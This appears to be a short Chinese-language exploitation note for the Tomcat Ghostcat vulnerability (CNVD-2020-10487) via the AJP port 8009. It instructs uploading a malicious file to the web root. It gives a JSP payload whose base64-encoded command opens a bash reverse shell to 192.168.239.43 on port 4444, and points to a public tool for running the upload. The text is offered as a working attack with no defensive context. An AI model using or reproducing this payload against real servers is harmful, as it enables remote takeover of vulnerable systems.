查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。
利用如下工具均可测试漏洞:
工具需要用到python2,
如果需要进一步利用需要向服务器的/webapps/ROOT目录下上传恶意文件
<%Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS40My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}");%>
利用工具https://github.com/00theway/Ghostcat-CNVD-2020-10487
进行执行上传的恶意文件